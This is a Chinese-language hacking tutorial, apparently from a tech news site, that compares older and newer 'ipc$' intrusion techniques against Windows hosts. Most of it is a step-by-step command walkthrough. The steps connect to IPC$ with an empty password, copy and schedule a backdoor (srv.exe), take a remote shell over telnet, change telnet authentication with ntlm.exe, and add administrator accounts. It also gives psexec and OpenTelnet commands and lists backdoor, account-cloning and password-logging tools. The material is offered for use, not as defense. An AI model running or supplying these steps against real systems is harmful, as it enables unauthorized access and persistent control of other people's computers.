ipc$入侵:过去 VS 现今

安全 黑客攻防
ipc$入侵的过去和当前既然是要对比,那么就先把过去的ipc$入侵步骤写给大家,然后呈现当今的ipc$入侵步骤,这些步骤比较经典还望你能理解。

ipc$入侵的过去:

[1]

C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators

\\用扫到的空口令建立连接   

[2]

c:\>net view \\127.0.0.1

\\查看远程的共享资源

[3]

C:\>copy srv.exe \\127.0.0.1\admin$\system32 

\\将一次性后门srv.exe复制到对方的系统文件夹下,前提是admin$开启  

[4]

C:\>net time \\127.0.0.1 

\\查看远程主机的当前时间

[5]

C:\>at \\127.0.0.1 时间 srv.exe 

\\用at命令远程运行srv.exe,需要对方开启了'Task Scheduler'服务  

[6]

C:\>net time \\127.0.0.1

\\再次查看当前时间来估算srv.exe是否已经运行,此步可以省略

[7]    

C:\>telnet 127.0.0.1 99 

\\开一个新窗口,用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思?那你就把它想象成远程机器的控制权就好了,操作像DOS),99端口是srv.exe开的一次性后门的端口  

[8]

C:\WINNT\system32>net start telnet

\\我们在刚刚登陆上的shell中启动远程机器的telnet服务,毕竟srv.exe是一次性的后门,我们需要一个长久的后门便于以后访问,如果对方的telnet已经启动,此步可省略

[9]

C:\>copy ntlm.exe \\127.0.0.1\admin$\system32

\\在原来那个窗口中将ntlm.exe传过去,ntlm.exe是用来更改telnet身份验证的  

[10]

C:\WINNT\system32>ntlm.exe 

\\在shell窗口中运行ntlm.exe,以后你就可以畅通无阻的telnet这台主机了

[11]

C:\>telnet 127.0.0.1 23

\\在新窗口中telnet到127.0.0.1,端口23可省略,这样我们又获得一个长期的后门

[12]

C:\WINNT\system32>net user 帐户名 密码 /add

C:\WINNT\system32>net uesr guest /active:yes

C:\WINNT\system32>net localgroup administrators 帐户名 /add

\\telnet上以后,你可以建立新帐户,激活guest,把任何帐户加入管理员组等

ipc$入侵的现在:

写到这里我似乎回到了2,3年前,那时的ipc$入侵大家都是这么用的,不过随着新工具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高效而简单的ipc$入侵吧。

[1]

psexec.exe \\IP -u 管理员帐号 -p 密码 cmd 

\\用这个工具我们可以一步到位的获得shell

OpenTelnet.exe \\server 管理员帐号 密码 NTLM的认证方式 port

\\用它可以方便的更改telnet的验证方式和端口,方便我们登陆

[2]

ipc$入侵过程已经没有第二步了,用一步获得shell之后,你做什么都可以了,安后门可以用winshell,克隆就用ca吧,开终端用3389.vbe,记录密码用win2kpass,总之好的工具不少,随你选了,我就不多说了。

责任编辑:佚名 来源: 网易
相关推荐

2009-05-15 17:23:56

2011-09-01 09:18:36

2011-09-22 09:31:52

笔记本用户体验

2011-08-31 16:01:33

2012-10-17 09:34:51

2009-03-09 13:59:22

IDC行业

2012-11-30 09:50:37

亚马逊云服务

2019-03-07 14:18:25

数据公司企业预知

2011-08-19 18:30:52

ipc中文man

2022-07-18 09:01:15

SwiftApple二进制目标

2017-05-15 19:40:40

AndroidIPC机制

2020-03-23 12:35:12

互联网阿里当当

2010-02-01 12:05:57

2011-10-28 16:03:06

2012-10-10 11:36:02

2010-02-01 12:07:42

2011-11-21 09:57:47

2010-02-01 12:01:53

2013-04-02 10:51:09

HadoopHadoop源码

2022-02-17 16:47:40

OpenharmonIPC通信鸿蒙
点赞
收藏

51CTO技术栈公众号